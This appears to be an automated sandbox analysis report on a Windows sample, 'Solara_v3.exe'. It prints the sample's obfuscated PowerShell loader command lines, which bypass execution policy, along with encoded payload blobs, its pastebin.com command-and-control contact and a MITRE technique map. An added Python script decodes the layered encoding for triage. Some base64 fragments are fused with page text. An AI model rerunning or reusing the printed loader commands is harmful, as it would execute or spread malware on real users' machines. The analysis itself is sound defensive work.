DAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAE
kAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFJump to behavior
Source: C:\Users\user\Desktop\Solara_v3.exe | Process created: C:\Windows\System32\attrib.exe "attrib" +h C:\WindowsSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A60.tmp" "c:\Users\user\AppData\Local\Temp\py0wfw3n\CSCB237945D4EF64F37AEB0937E3F152BA1.TMP"
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nologo -noninteractive -noprofile -executionpolicy bypass -encodedcommand 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
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -nologo -noninteractive -noprofile -executionpolicy bypass -encodedcommand wwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacgajwb7aciauwbjahiaaqbwahqaiga6aciayqbxafkazwblaemamqb1agiamwbragcaswbgahqavablafgatgawafoavwawahuavabxaeyadqbzafcazabsagiavwbwahuazabdaduaqgbkafgaugb2agiavwbgadaayqbxadkadqbmagwaqgbuafyasabsahcawgbvaduaaabiafcavgbkaeoamqbkahaaygbqae0aeqbkahkaawb1afyasabsahcawgbtagsazwblahcamablaekaqwbbagcasqbfaeyaawbaaemamqbvaguawabcagwasqbfaeeaaqbeafeabwbnaekaqwbbagcazabyae4acabiag0aywbnafuamwbsahoazabhafyadabpahcamablaekaqwbbagcasqbiafyaegbhafcanqbuaekargboaduaywazafiababiafmanqbtagqavwa1adaayqbxadeababmagsabab1agqarwbwahkaygazaeiavabaafgasgayageavwboagwaywb6ahmatgbdagcamablaekaqwbbagcasqbiaeiamqbzag0aeabwafkaeqbcagoaygbhaeyaegbjahkaqgbyageavwa0ahoatqbpaeianwbeafeabwbnaekaqwbbagcasqbdaeeazwbjaeyadabfagiarwb4aeoaygbyaeiadgbjag4auqbvaekabgbwahoawgbyaekaegbnagkanqbragiarwb3agkaswbwadaatgbdagkaqqbnaekaqwbbagcasqbdaeeazwbjaegavgbpagiarwbsagoasqbiae4amabzafgaugbwafkaeqbcagwazqbiafiababjag0anabnafmavwa1adaavqbiafiaeqbjaeuazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafgayqbxaduaawbiadmaywbvaesavabzae4aqwbnadaaswbjaemaqqbnaekaqwbbagcasqbdaeiaygbsaecaeabzafmavwaxahcaygazaeoamablaemasgaxagmamgbwahkatqb6aekadqbaaecaeabzaekaaqbsagqarabrag8azwbjaemaqqbnaekaqwbbagcasqbgahqaeqbaafgaugaxagmabqa0adyasqbfadeaaabjag4atgbvafkavwb4aeiaywb5aggavgbiag0amqboagiabqbgag4awgbxafiavqblafgaqgbsaewaawbkahyaygayahcacabyafeamablaekaqwbbagcasqbdaeeazwbjaemaqgb3agqavwbkahmayqbxae0azwbjadmaugboagqarwbsagoasqbhafyanabkaecavgb5agiaaqbcagkaygayadkacwbjaeyatgbvagiamwbkafgayqbxaduaawbiadmaywbvafmavwa1adaavqbiafiaeqbjaecaaabyagiabqbrahmasqbhagwadqbkaemaqgb1afeamgaxagsavqayaggadgbkahkaawa3aeqauqbvagcasqbdaeeazwbmafeamablae
kaawbbae4aqwbuadaatgbdag0awgaxagiabqboadaayqbxadkadqbjaeuazabsagqarqbgagoazabhagwamgbaafyazabwagiabqbsahyazaaxafiacabkaecaeabsaesaqwbragcazqb3adaaswbjaemaqqbnaekaqwbsag8avgayaduaawbjaeqamabnafcamqbkahaaygbqae0aeqbyafqabwa2afiamgbwadaaugbtadkaeqbaafcazab5agiamwbwahuawgbgagqacabiag0augb2agqaeqbnahaarabrag8azwbjaemaqqbnaeoasaboagkasqbeadaazwbuag0avgazaewavqa5agkayqbtafyaagbkaemaqgbuaguawaboadaawgbxadaadqbwaecavga0agqaqwa1afqazabiaeoacabiag0azabdagqavwbsahmawgbhafyaeqblaeqasqaxae4aaqbrae4aqwbpaeeazwbjaemaqgbiafyamgbsahuatqb6aeoazabpagoacabiafoawabsafgayqbxaduaawbiadmazabvafoawaboadaaswbdafiabwbwadianqbraewaqwbbagsaywayaekacwbjaemaugb6afkaaqa1aeqawqbyaeiaaabzadiabaawaguauwbragcazgbdaeiauabkafgauqb0afqabgbwahmaygbbadaaswbjaemaqqbnaekasabkagwazabiafyaeqbiagkaqqbragmamgbjahuavgbhadkavabkaegasgbwagiabqbjag8aswbradaaswbmafeamablafoabgbwahuawqazafiacabiadianabnafmarwbsagsawgbvaeyaagbkaecabaayafoavgbkahaaygbtafiadgbkahkazwbwaekasabzae4aqwbpaeeazwbjaemaqqbrageargbkahuawgbdaeeaoqbjaeyadabyageavwa0ahoatqbsadaangbpagsazabsagqarqbaahyaywbtafyabgbjag0aoqaxagiabqbsafJump to behavior
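The three encoding layers in the process-creation entries above (an -EncodedCommand argument that is base64 over UTF-16LE, a one-liner that pulls a base64 Script field out of a JSON literal, and the UTF-8 script it pipes to iex) are easy to peel offline. The following Python is an added triage example written for this page; it is not code from the report or from the sample. It rebuilds the same wrapping around a constructed stand-in script (so it runs without the real payload), decodes it back, and flags the switches the Sigma hits key on. The stand-in script and the switch list are assumptions made for the example; the wrapper one-liner is the one shown in the "Base64 decoded" entry above.

```python
"""Peel the layered PowerShell -EncodedCommand seen in this report (added example)."""
import base64
import json
import re
from typing import Optional

# Constructed stand-in, NOT the report's payload: shaped like the decoded inner
# script (Add-Type of a user32.dll P/Invoke class, which is why PowerShell
# spawns csc.exe) but trimmed to the minimum.
SAMPLE_SCRIPT = (
    "if (-not ([System.Management.Automation.PSTypeName]'Win32').Type) {\r\n"
    "    Add-Type @\"\r\n"
    "    using System;\r\n"
    "    using System.Runtime.InteropServices;\r\n"
    "    public class Win32 {\r\n"
    "        [DllImport(\"user32.dll\")]\r\n"
    "        public static extern IntPtr GetForegroundWindow();\r\n"
    "    }\r\n"
    "\"@\r\n"
    "}\r\n"
)

# Switches worth flagging (assumed list); matched case-insensitively because the
# report also prints a fully lower-cased copy of the same command line.
RISKY_SWITCHES = ("-executionpolicy bypass", "-encodedcommand", "-noninteractive", "-noprofile")


def build_encoded_command(script: str) -> str:
    """Wrap SCRIPT exactly as the sample does, so the decoder can be exercised offline.

    Layer 3: base64(UTF-8 script) inside a JSON literal {"Script": ...}
    Layer 2: one-liner that parses the JSON, base64-decodes .Script and pipes it to iex
    Layer 1: base64(UTF-16LE one-liner), the form -EncodedCommand expects
    """
    inner_b64 = base64.b64encode(script.encode("utf-8")).decode("ascii")
    wrapper = (
        "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("
        "('{\"Script\":\"" + inner_b64 + "\"}' | ConvertFrom-Json).Script)) | iex"
    )
    return base64.b64encode(wrapper.encode("utf-16-le")).decode("ascii")


def extract_encoded_argument(cmdline: str) -> Optional[str]:
    """Return the token after -EncodedCommand (or any prefix PowerShell accepts, e.g. -enc)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lower().lstrip("-/")
        if name and "encodedcommand".startswith(name):
            return tokens[i + 1]
    return None


# ('{...}' | ConvertFrom-Json).Field  ->  group 1 = JSON literal, group 2 = field name
_JSON_FIELD = re.compile(r"\('(\{.*?\})'\s*\|\s*ConvertFrom-Json\)\.(\w+)", re.S)


def decode_layers(encoded: str) -> Optional[str]:
    """Peel all three layers; return the final script, or None if any layer is malformed.

    Base64 is case-sensitive, so the lower-cased copy the report prints for one
    instance decodes to garbage rather than to the wrapper and yields None here.
    """
    try:
        wrapper = base64.b64decode(encoded, validate=True).decode("utf-16-le")
        m = _JSON_FIELD.search(wrapper)
        if not m:
            return None
        field = json.loads(m.group(1))[m.group(2)]
        return base64.b64decode(field, validate=True).decode("utf-8")
    except (ValueError, KeyError):  # binascii.Error, JSONDecodeError and UnicodeDecodeError are ValueErrors
        return None


def triage_command_line(cmdline: str) -> dict:
    """Summarise one process-creation command line: risky switches plus the recovered script."""
    lowered = cmdline.lower()
    encoded = extract_encoded_argument(cmdline)
    return {
        "flags": [s for s in RISKY_SWITCHES if s in lowered],
        "script": decode_layers(encoded) if encoded else None,
    }


if __name__ == "__main__":
    cmd = ('"powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass '
           '-EncodedCommand ' + build_encoded_command(SAMPLE_SCRIPT))
    result = triage_command_line(cmd)
    print(result["flags"])
    print(result["script"])
```

Feed triage_command_line() the command line from a Sysmon event 1 or Windows 4688 record. A lower-cased copy of the line, as the report prints for one instance, still produces the flags but no script, which is a reminder to collect the original-case command line when hunting.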
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (5 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (matched techniques per tactic; the number is the count of signatures mapped to the technique; the unmatched placeholder cells of the full matrix are omitted)

Execution: 22 Command and Scripting Interpreter; 2 PowerShell
Persistence: 1 DLL Side-Loading
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 DLL Side-Loading
Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 12 System Information Discovery
Collection: 1 Archive Collected Data
Command and Control: 1 Web Service; 12 Encrypted Channel; 1 Non-Application Layer Protocol; 2 Application Layer Protocol
No matches: Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact
Behavior Graph ID: 1585428 | Sample: Solara_v3.exe | Start date: 07/01/2025 | Architecture: WINDOWS | Score: 80

Sample-level signatures: Malicious sample detected (through community Yara rule); Yara detected Powershell decode and execute; Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet; 2 other signatures
Network: pastebin.com, 104.20.3.235, 443, 49736, CLOUDFLARENETUS, United States (Connects to a pastebin service (likely for C&C))

Process tree:
Solara_v3.exe 2 (Encrypted powershell cmdline option found; Bypasses PowerShell execution policy)
    -> powershell.exe 22
        dropped: C:\Users\user\AppData\...\py0wfw3n.cmdline, Unicode
        -> csc.exe 3
            dropped: C:\Users\user\AppData\Local\...\py0wfw3n.dll, PE32
            -> cvtres.exe 1
    -> conhost.exe
    -> attrib.exe 1

Source | Detection | Scanner | Label | Link
Solara_v3.exe | 8% | ReversingLabs | Win64.Malware.Generic
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
Source | Detection | Scanner | Label | Link
https://streams.spec.whatwg.org/ | 0% | Avira URL Cloud | safe
https://fetch.spec.whatwg.org/#concept-headers-fill | 0% | Avira URL Cloud | safe
https://dom.spec.whatwg.org/#concept-event-listener-inner-invoke | 0% | Avira URL Cloud | safe
https://fetch.spec.whatwg.org/#concept-headers-append | 0% | Avira URL Cloud | safe
https://url.spec.whatwg.org/#port-state | 0% | Avira URL Cloud | safe
https://fetch.spec.whatwg.org/#forbidden-response-header-name | 0% | Avira URL Cloud | safe
https://fetch.spec.whatwg.org/#concept-network-error | 0% | Avira URL Cloud | safe
https://fetch.spec.whatwg.org/#ref-for-dom-body-formdata | 0% | Avira URL Cloud | safe
https://dom.spec.whatwg.org/#get-the-parent | 0% | Avira URL Cloud | safe
https://w3c.github.io/permissions/#permissionstatus | 0% | Avira URL Cloud | safe
https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions. | 0% | Avira URL Cloud | safe
https://fetch.spec.whatwg.org/#body-mixin | 0% | Avira URL Cloud | safe
https://dl.deno.land/canary/(bN | 0% | Avira URL Cloud | safe
https://dom.spec.whatwg.org/#concept-event-listener-invoke | 0% | Avira URL Cloud | safe
https://w3c.github.io/permissions/#status-of-a-permission | 0% | Avira URL Cloud | safe
https://dl.deno.land/canary/ | 0% | Avira URL Cloud | safe
https://crbug.com/v8/8520turbo_fast_api_callsenable | 0% | Avira URL Cloud | safe
https://w3c.github.io/permissions/#permission-descriptor | 0% | Avira URL Cloud | safe
https://dom.spec.whatwg.org/#retarget | 0% | Avira URL Cloud | safe
https://w3c.github.io/FileAPI/ | 0% | Avira URL Cloud | safe
https://dom.spec.whatwg.org/#concept-event-path-append | 0% | Avira URL Cloud | safe
https://url.spec.whatwg.org/#idna | 0% | Avira URL Cloud | safe
https://fetch.spec.whatwg.org/#concept-construct-readablestream | 0% | Avira URL Cloud | safe
https://dl.deno.land/canary-latest.txt | 0% | Avira URL Cloud | safe
https://fetch.spec.whatwg.org/#dom-headers | 0% | Avira URL Cloud | safe
https://dom.spec.whatwg.org/#event-path | 0% | Avira URL Cloud | safe
https://some/file.ts | 0% | Avira URL Cloud | safe
https://wicg.github.io/import-maps/ | 0% | Avira URL Cloud | safe
https://w3c.github.io/user-timing) | 0% | Avira URL Cloud | safe
https://dl.deno.land/canary/(b | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pastebin.com | 104.20.3.235 | true | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.rapidtables.com/convert/color/hsl-to-rgb.html | Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://fetch.spec.whatwg.org/#concept-headers-append | Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dom.spec.whatwg.org/#concept-event-listener-inner-invoke | Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://deno.land/std/examples/colors.tsGenerate | Solara_v3.exe | false | - | high
https://github.com/chalk/ansi-regex/blob/2b56fb0c7a07108e5b54241e8faec160d393aedb/index.js | Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://url.spec.whatwg.org/#special-scheme | Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://fetch.spec.whatwg.org/#forbidden-response-header-name | Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fetch.spec.whatwg.org/#concept-network-error | Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://url.spec.whatwg.org/#port-state | Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fetch.spec.whatwg.org/#concept-headers-fill | Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/denoland/deno/issues | Solara_v3.exe | false | - | high
https://streams.spec.whatwg.org/ | Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fetch.spec.whatwg.org/#ref-for-dom-body-formdata | Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/beatgammit/base64-js | Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://deno.land/x/example/types.d.ts | Solara_v3.exe | false | - | high
https://deno.land/std/fmt/colors.ts | Solara_v3.exe | false | - | high
https://console.spec.whatwg.org/#console-namespace | Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://no-color.org/ | Solara_v3.exe | false | - | high
https://www.npmjs.com/package/tslib). | Solara_v3.exe | false | - | high
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Instanc | Solara_v3.exe | false | - | high
https://dom.spec.whatwg.org/#get-the-parent | Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://w3c.github.io/permissions/#permissionstatus | Solara_v3.exe | false | Avira URL Cloud: safe | unknown
https://deno.land/x/ | Solara_v3.exe | false | - | high
https://dom.spec.whatwg.org/#concept-event-listener-invoke | Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1732463624.00000141F3F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws= | Solara_v3.exe | false | - | high
https://crbug.com/v8/8520turbo_fast_api_callsenable | Solara_v3.exe | false | Avira URL Cloud: safe | unknown
https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope | Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://deno.land/manual/runtime/compiler_apis#denobundle). | Solara_v3.exe | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1714210124.00000141E3D71000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/bitinn/node-fetch/blob/master/src/headers.js | Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/LinkErr | Solara_v3.exe | false | - | high
https://w3c.github.io/permissions/#status-of-a-permission | Solara_v3.exe | false | Avira URL Cloud: safe | unknown
https://developer.mozilla.org/) | Solara_v3.exe | false | - | high
https://dl.deno.land/canary/ | Solara_v3.exe | false | Avira URL Cloud: safe | unknown
https://fetch.spec.whatwg.org/#body-mixin | Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1714210124.00000141E3FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1714210124.00000141E3FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://github.com/inexorabletash/text-encoding | Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmp | false
                                                      high
                                                      https://go.micropowershell.exe, 00000002.00000002.1714210124.00000141E49A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws=EDSolara_v3.exefalse
                                                          high
                                                          https://w3c.github.io/permissions/#permission-descriptorSolara_v3.exefalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://contoso.com/Iconpowershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://dom.spec.whatwg.org/#retargetSolara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://golang.org/pkg/bytes/#Buffer.Grow).Solara_v3.exefalse
                                                              high
                                                              https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.Solara_v3.exefalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1714210124.00000141E3FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/compileSolara_v3.exefalse
                                                                  high
                                                                  https://www.catcert.net/verarrelSolara_v3.exefalse
                                                                    high
                                                                    https://dl.deno.land/canary/(bNSolara_v3.exe, 00000000.00000002.1753019926.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp, Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://myserver.comSolara_v3.exefalse
                                                                      high
                                                                      https://w3c.github.io/FileAPI/Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://golang.org/pkg/bytes/#Buffer).Solara_v3.exefalse
                                                                        high
